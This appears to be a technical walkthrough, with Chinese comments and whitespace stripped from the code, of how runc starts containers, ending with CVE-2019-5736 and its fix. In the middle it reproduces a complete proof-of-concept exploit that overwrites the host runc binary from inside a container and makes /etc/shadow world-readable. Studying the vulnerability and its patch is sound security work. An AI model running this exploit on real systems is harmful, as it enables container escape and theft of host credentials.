// default action is to start a container
varrunCommand=cli.Command{Name:"run",Usage:"create and run a container",...Action:func(context*cli.Context)error{iferr:=checkArgs(context,1,exactArgs);err!=nil{returnerr}status,err:=startContainer(context,CT_ACT_RUN,nil)iferr==nil{// exit with the container's exit status so any external supervisor is
// notified of the exit with the correct exit status.
os.Exit(status)}returnfmt.Errorf("runc run failed: %w",err)},}
funcstartContainer(context*cli.Context,actionCtAct,criuOpts*libcontainer.CriuOpts)(int,error){iferr:=revisePidFile(context);err!=nil{return-1,err}//读取配置文件,获取配置信息
spec,err:=setupSpec(context)iferr!=nil{return-1,err}id:=context.Args().First()ifid==""{return-1,errEmptyID}notifySocket:=newNotifySocket(context,os.Getenv("NOTIFY_SOCKET"),id)ifnotifySocket!=nil{iferr:=notifySocket.setupSpec(context,spec);err!=nil{return-1,err}}//传入配置参数,创建container对象
container,err:=createContainer(context,id,spec)iferr!=nil{return-1,err}ifnotifySocket!=nil{iferr:=notifySocket.setupSocketDirectory();err!=nil{return-1,err}ifaction==CT_ACT_RUN{iferr:=notifySocket.bindSocket();err!=nil{return-1,err}}}// Support on-demand socket activation by passing file descriptors into the container init process.
listenFDs:=[]*os.File{}ifos.Getenv("LISTEN_FDS")!=""{listenFDs=activation.Files(false)}r:=&runner{enableSubreaper:!context.Bool("no-subreaper"),shouldDestroy:!context.Bool("keep"),container:container,listenFDs:listenFDs,notifySocket:notifySocket,consoleSocket:context.String("console-socket"),detach:context.Bool("detach"),pidFile:context.String("pid-file"),preserveFDs:context.Int("preserve-fds"),action:action,criuOpts:criuOpts,init:true,}returnr.run(spec.Process)}
func(r*runner)run(config*specs.Process)(int,error){...//根据config创建process
process,err:=newProcess(*config)iferr!=nil{return-1,err}process.LogLevel=strconv.Itoa(int(logrus.GetLevel()))// Populate the fields that come from runner.
process.Init=r.init//r.init为 true
...//r.action此时为CT_ACT_RUN
switchr.action{caseCT_ACT_CREATE:err=r.container.Start(process)caseCT_ACT_RESTORE:err=r.container.Restore(process,r.criuOpts)caseCT_ACT_RUN://调用该方法
err=r.container.Run(process)default:panic("Unknown action")}...}
func(c*linuxContainer)start(process*Process)(retErrerror){//创建parent对象
parent,err:=c.newParentProcess(process)iferr!=nil{returnfmt.Errorf("unable to create new parent process: %w",err)}logsDone:=parent.forwardChildLogs()iflogsDone!=nil{deferfunc(){// Wait for log forwarder to finish. This depends on
// runc init closing the _LIBCONTAINER_LOGPIPE log fd.
err:=<-logsDoneiferr!=nil&&retErr==nil{retErr=fmt.Errorf("unable to forward init logs: %w",err)}}()}//启动子进程
iferr:=parent.start();err!=nil{returnfmt.Errorf("unable to start container process: %w",err)}ifprocess.Init{c.fifo.Close()ifc.config.Hooks!=nil{s,err:=c.currentOCIState()iferr!=nil{returnerr}iferr:=c.config.Hooks[configs.Poststart].RunHooks(s);err!=nil{iferr:=ignoreTerminateErrors(parent.terminate());err!=nil{logrus.Warn(fmt.Errorf("error running poststart hook: %w",err))}returnerr}}}returnnil}
func(c*linuxContainer)newParentProcess(p*Process)(parentProcess,error){//创建管道文件,管道的两端 parent/child 分别供父子进程使用
parentInitPipe,childInitPipe,err:=utils.NewSockPair("init")iferr!=nil{returnnil,fmt.Errorf("unable to create init pipe: %w",err)}messageSockPair:=filePair{parentInitPipe,childInitPipe}parentLogPipe,childLogPipe,err:=os.Pipe()iferr!=nil{returnnil,fmt.Errorf("unable to create log pipe: %w",err)}logFilePair:=filePair{parentLogPipe,childLogPipe}//写入子进程的命令
cmd:=c.commandTemplate(p,childInitPipe,childLogPipe)if!p.Init{returnc.newSetnsProcess(p,cmd,messageSockPair,logFilePair)}// We only set up fifoFd if we're not doing a `runc exec`. The historic
// reason for this is that previously we would pass a dirfd that allowed
// for container rootfs escape (and not doing it in `runc exec` avoided
// that problem), but we no longer do that. However, there's no need to do
// this for `runc exec` so we just keep it this way to be safe.
iferr:=c.includeExecFifo(cmd);err!=nil{returnnil,fmt.Errorf("unable to setup exec fifo: %w",err)}returnc.newInitProcess(p,cmd,messageSockPair,logFilePair)}
func(c*linuxContainer)commandTemplate(p*Process,childInitPipe*os.File,childLogPipe*os.File)*exec.Cmd{//initPath: "/proc/self/exe"
//initArgs: ["runc", "init"]
cmd:=exec.Command(c.initPath,c.initArgs[1:]...)cmd.Args[0]=c.initArgs[0]cmd.Stdin=p.Stdincmd.Stdout=p.Stdoutcmd.Stderr=p.Stderrcmd.Dir=c.config.Rootfsifcmd.SysProcAttr==nil{cmd.SysProcAttr=&unix.SysProcAttr{}}cmd.Env=append(cmd.Env,"GOMAXPROCS="+os.Getenv("GOMAXPROCS"))cmd.ExtraFiles=append(cmd.ExtraFiles,p.ExtraFiles...)ifp.ConsoleSocket!=nil{cmd.ExtraFiles=append(cmd.ExtraFiles,p.ConsoleSocket)cmd.Env=append(cmd.Env,"_LIBCONTAINER_CONSOLE="+strconv.Itoa(stdioFdCount+len(cmd.ExtraFiles)-1),)}//传入用于通信的管道文件
cmd.ExtraFiles=append(cmd.ExtraFiles,childInitPipe)cmd.Env=append(cmd.Env,"_LIBCONTAINER_INITPIPE="+strconv.Itoa(stdioFdCount+len(cmd.ExtraFiles)-1),"_LIBCONTAINER_STATEDIR="+c.root,)cmd.ExtraFiles=append(cmd.ExtraFiles,childLogPipe)cmd.Env=append(cmd.Env,"_LIBCONTAINER_LOGPIPE="+strconv.Itoa(stdioFdCount+len(cmd.ExtraFiles)-1),"_LIBCONTAINER_LOGLEVEL="+p.LogLevel,)// NOTE: when running a container with no PID namespace and the parent process spawning the container is
// PID1 the pdeathsig is being delivered to the container's init process by the kernel for some reason
// even with the parent still running.
ifc.config.ParentDeathSignal>0{cmd.SysProcAttr.Pdeathsig=unix.Signal(c.config.ParentDeathSignal)}returncmd}
packagemainimport("os""runtime""strconv""github.com/opencontainers/runc/libcontainer"//匿名引入nsenter包
_"github.com/opencontainers/runc/libcontainer/nsenter""github.com/sirupsen/logrus")funcinit(){//这里 os.Args[1] == "init" 匹配 "runc init" 命令
iflen(os.Args)>1&&os.Args[1]=="init"{// This is the golang entry point for runc init, executed
// before main() but after libcontainer/nsenter's nsexec().
...factory,_:=libcontainer.New("")iferr:=factory.StartInitialization();err!=nil{// as the error is sent back to the parent there is no need to log
// or write it to stderr because the parent process will handle this
os.Exit(1)}panic("libcontainer: container init failed to exec")}}
voidnsexec(void){intpipenum;jmp_bufenv;intsync_child_pipe[2],sync_grandchild_pipe[2];structnlconfig_tconfig={0};.../*
* Get the init pipe fd from the environment. The init pipe is used to
* read the bootstrap data and tell the parent what the new pids are
* after the setup is done.
*///获取管道文件,读取namespaces信息
pipenum=getenv_int("_LIBCONTAINER_INITPIPE");if(pipenum<0){/* We are not a runc init. Just return to go runtime. */return;}.../* Parse all of the netlink configuration. *///从pipe读取容器配置信息
nl_parse(pipenum,&config);...current_stage=setjmp(env);switch(current_stage){/*
* Stage 0: We're in the parent. Our job is just to create a new child
* (stage 1: STAGE_CHILD) process and write its uid_map and
* gid_map. That process will go on to create a new process, then
* it will send us its PID which we will send to the bootstrap
* process.
*/caseSTAGE_PARENT:{...}break;/*
* Stage 1: We're in the first child process. Our job is to join any
* provided namespaces in the netlink payload and unshare all of
* the requested namespaces. If we've been asked to CLONE_NEWUSER,
* we will ask our parent (stage 0) to set up our user mappings
* for us. Then, we create a new child (stage 2: STAGE_INIT) for
* PID namespace. We then send the child's PID to our parent
* (stage 0).
*/caseSTAGE_CHILD:{.../*
* We need to setns first. We cannot do this earlier (in stage 0)
* because of the fact that we forked to get here (the PID of
* [stage 2: STAGE_INIT]) would be meaningless). We could send it
* using cmsg(3) but that's just annoying.
*///加入命名空间
if(config.namespaces)join_namespaces(config.namespaces);...}break;/*
* Stage 2: We're the final child process, and the only process that will
* actually return to the Go runtime. Our job is to just do the
* final cleanup steps and then return to the Go runtime to allow
* init_linux.go to run.
*/caseSTAGE_INIT:{...}break;default:bail("unknown stage '%d' for jump value",current_stage);}
func(l*LinuxFactory)StartInitialization()(errerror){// Get the INITPIPE.
// 从环境变量获取管道文件
envInitPipe:=os.Getenv("_LIBCONTAINER_INITPIPE")pipefd,err:=strconv.Atoi(envInitPipe)iferr!=nil{err=fmt.Errorf("unable to convert _LIBCONTAINER_INITPIPE: %w",err)logrus.Error(err)returnerr}pipe:=os.NewFile(uintptr(pipefd),"pipe")deferpipe.Close()...i,err:=newContainerInit(it,pipe,consoleSocket,fifofd,logPipeFd)iferr!=nil{returnerr}// If Init succeeds, syscall.Exec will not return, hence none of the defers will be called.
returni.Init()
func(l*linuxStandardInit)Init()error{...//设置网络
iferr:=setupNetwork(l.config);err!=nil{returnerr}//设置路由
iferr:=setupRoute(l.config.Config);err!=nil{returnerr}// initialises the labeling system
selinux.GetEnabled()//切换为容器内的文件系统
iferr:=prepareRootfs(l.pipe,l.config);err!=nil{returnerr}...//替换自身进程
iferr:=system.Exec(name,l.config.Args[0:],os.Environ());err!=nil{returnfmt.Errorf("can't exec user process: %w",err)}returnnil
packagemain// Implementation of CVE-2019-5736
// Created with help from @singe, @_cablethief, and @feexd.
// This commit also helped a ton to understand the vuln
// https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d
import("fmt""io/ioutil""os""strconv""strings")// This is the line of shell commands that will execute on the host
varpayload="#!/bin/bash \n cat /etc/shadow > /tmp/shadow && chmod 777 /tmp/shadow"funcmain(){// First we overwrite /bin/sh with the /proc/self/exe interpreter path
fd,err:=os.Create("/bin/sh")iferr!=nil{fmt.Println(err)return}fmt.Fprintln(fd,"#!/proc/self/exe")err=fd.Close()iferr!=nil{fmt.Println(err)return}fmt.Println("[+] Overwritten /bin/sh successfully")// Loop through all processes to find one whose cmdline includes runcinit
// This will be the process created by runc
varfoundintforfound==0{pids,err:=ioutil.ReadDir("/proc")iferr!=nil{fmt.Println(err)return}for_,f:=rangepids{fbytes,_:=ioutil.ReadFile("/proc/"+f.Name()+"/cmdline")fstring:=string(fbytes)ifstrings.Contains(fstring,"runc"){fmt.Println("[+] Found the PID:",f.Name())found,err=strconv.Atoi(f.Name())iferr!=nil{fmt.Println(err)return}}}}// We will use the pid to get a file handle for runc on the host.
varhandleFd=-1forhandleFd==-1{// Note, you do not need to use the O_PATH flag for the exploit to work.
handle,_:=os.OpenFile("/proc/"+strconv.Itoa(found)+"/exe",os.O_RDONLY,0777)ifint(handle.Fd())>0{handleFd=int(handle.Fd())}}fmt.Println("[+] Successfully got the file handle")// Now that we have the file handle, lets write to the runc binary and overwrite it
// It will maintain it's executable flag
for{writeHandle,_:=os.OpenFile("/proc/self/fd/"+strconv.Itoa(handleFd),os.O_WRONLY|os.O_TRUNC,0700)ifint(writeHandle.Fd())>0{fmt.Println("[+] Successfully got write handle",writeHandle)writeHandle.Write([]byte(payload))return}}}
voidnsexec(void){.../*
* We need to re-exec if we are not in a cloned binary. This is necessary
* to ensure that containers won't be able to access the host binary
* through /proc/self/exe. See CVE-2019-5736.
*/if(ensure_cloned_binary()<0)bail("could not ensure we are a cloned binary");...}
intensure_cloned_binary(void){intexecfd;char**argv=NULL;/* Check that we're not self-cloned, and if we are then bail. */intcloned=is_self_cloned();if(cloned>0||cloned==-ENOTRECOVERABLE)returncloned;if(fetchve(&argv)<0)return-EINVAL;//复制匿名文件
execfd=clone_binary();if(execfd<0)return-EIO;if(putenv(CLONED_BINARY_ENV"=1"))gotoerror;//执行该复制的匿名文件
fexecve(execfd,argv,environ);error:close(execfd);return-ENOEXEC;}
runC passes a file descriptor from the host’s filesystem to the “runc
init” bootstrap process when joining a container. This allows a
malicious process inside a container to gain access to the host
filesystem with its current privilege set. Due to the race window
between join-and-execve being quite small, this bug is quite hard to
exploit. A similar, though mostly unrelated, exploit was discovered in
LXC[1].